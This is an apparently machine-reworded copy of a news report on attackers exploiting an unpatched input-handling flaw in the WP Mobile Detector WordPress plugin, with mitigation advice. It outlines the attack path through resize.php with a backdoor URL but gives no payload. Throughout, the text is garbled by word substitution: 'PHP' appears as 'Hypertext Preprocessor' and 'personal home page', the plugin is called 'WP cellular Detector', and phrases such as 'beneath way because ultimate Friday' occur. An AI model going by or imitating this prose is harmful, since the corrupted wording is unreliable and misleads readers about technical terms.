WordPress plugin with 10,000+ installations being exploited within the wild

Posted on Jun 17 2016 - 5:40am by lepocha

A growing variety of WordPress web sites were infected by attackers exploiting a vulnerability that remains unpatched in an extensively used plugin known as WP mobile Detector, security researchers warned.

The assaults were beneath way because ultimate Friday and are specially being used to install porn-associated spamming scripts, in keeping with a blog post published Thursday. The underlying vulnerability in WP cellular Detector got here to light on Tuesday in this put up. The plugin has considering that been eliminated from the authentic WordPress plugin directory. As of Wednesday, the plugin reportedly had extra than 10,000 active installations, and it seems many remained active on the time this put up turned into being prepared.

The security flaw stems from the plugin’s failure to get rid of malicious input submitted through website visitors. Because the WP mobile Detector performs no safety exams, an attacker can feed malicious personal home page code into requests obtained by using web sites that use the plugin.

“The vulnerability may be very smooth to exploit,” Sucuri protection analyst Douglas Santos wrote. “All the attacker needs to do is ship a request to resize. Hypertext Preprocessor or timthumb.personal home page (yes, timthumb, in this case it simply consists of resize. Hypertext Preprocessor), inside the plugin directory with the backdoor URL.”

Without a replace to be had, the maximum practical course of movement for inclined web sites is to completely uninstall WP cellular Detector. A partial restoration entails disabling Hypertext Preprocessor execution within the plugin’s subdirectory, however that measure does not stop attackers from uploading malicious files to that listing and linking to them somewhere else on line. Internet site directors may additionally revoke write permissions altogether in the subdirectory, but which can prevent the plugin from running. Maximum software stage firewalls do not provide meaningful protection in opposition to the exploits both, even though Sucuri stated its firewall carrier does offer a patch using a digital hardening engine. The vulnerability can be exploited the simplest while php choice allow_url_fopen is enabled.

If the exploit’s invocation of resize.personal home page sounds acquainted, it may be because of the latest vulnerability detected in ImageMagick, an extensively used photograph-processing library that many web sites use immediately or indirectly to resize snap shots uploaded by cease customers. But, Sucuri CTO Daniel Cid informed Ars that there may be no connection among the 2 vulnerabilities.